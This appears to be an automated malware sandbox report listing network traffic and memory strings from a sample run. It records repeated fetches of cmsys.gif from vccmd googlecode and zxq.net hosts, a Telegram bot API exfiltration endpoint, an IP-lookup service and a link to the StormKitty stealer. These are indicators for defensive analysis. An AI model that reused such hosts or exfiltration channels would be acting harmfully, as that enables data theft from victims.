                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                Source: Joe Sandbox ViewIP Address: 104.18.114.97 104.18.114.97
                Source: svchost.exe, 00000027.00000002.537976090.000001E1CF665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: svchost.exe, 00000027.00000002.537391592.000001E1CF612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: AppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                Source: AppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                Source: AppLaunch.exe, 00000002.00000002.277665850.00000000072EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com4
                Source: AppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                Source: lg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000000.260922909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Lg3gn9y1Cj.exe, lg3gn9y1cj.exe .0.drString found in binary or memory: https://api.telegram.org/bot
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://api.w.org/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000020.00000002.340646208.000001401B84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337917326.000001401B846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340715628.000001401B85C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000020.00000002.340715628.000001401B85C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337301947.000001401B863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://fonts.googleapis.com/css?family=DM
                Source: AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://news.google.com/publications/CAAqBwgKMJSRswswoazKAw?hl=en-US&gl=US&ceid=US%3Aen
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://schema.org
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337977205.000001401B856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337977205.000001401B856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000020.00000002.340065799.000001401B83A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000020.00000002.340646208.000001401B84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337917326.000001401B846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411158230.0000000003B24000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.408331910.0000000003B24000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537924053.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.374604090.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411195559.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/#logo
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/#organization
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/#website
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/?p=187
                Source: explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/?s=
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/about-us/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/best-mothers-day-gifts-of-2022-for-every-mom/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/contact-us/
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/feed/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/how-to-find-an-investor-for-your-business/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/business/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/entertainment/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/science-health/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/technology/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/online-shopping-tips-during-covid/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/privacy-policy/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/reasons-to-hire-a-truck-accident-attorney/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/the-future-of-cryptocurrency-is-it-time-to-get-your-crypto-license-in-europe/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/these-are-the-injured-you-may-suffer-in-a-bicycle-accident/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumb
                Source: explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#webpage
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/;
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/L
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/n
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/ne
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-is-the-best-way-to-learn-golang/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/why-you-should-seek-an-uber-or-lyft-accident-lawyer/
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2106
